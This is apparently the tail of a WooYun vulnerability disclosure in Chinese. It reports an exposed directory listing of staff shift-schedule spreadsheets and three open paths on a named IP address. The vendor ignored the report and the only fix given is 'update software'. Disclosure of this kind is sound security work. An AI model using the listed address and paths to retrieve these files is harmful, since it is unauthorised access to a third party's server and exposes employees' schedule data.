2015年5月31日 21:17 10702 重工北6月导入排班.xlsx
2015年8月1日 10:45 10631 重工北8月导入排班.xlsx
2015年8月31日 21:10 10943 重工北9月导入排班.xlsx
2015年3月18日 11:04 14336 长白班表.xls
2014年10月29日 8:49 11776 预审中心导入排班10月.xls
2014年10月8日 17:28 14336 领导 导入排班1.xls
2015年2月2日 10:01 15360 黄河北导入排班1.xls
2015年5月3日 15:37 16384 黄河北导入排班5月.xls
2014年12月12日 10:41 10752 黄淼.xls


还有

http://59.46.94.68/systemmanage/
http://59.46.94.68/data
http://59.46.94.68/js等等

修复方案:

更新软件

版权声明:转载请注明来源 默之@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-12 23:28

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无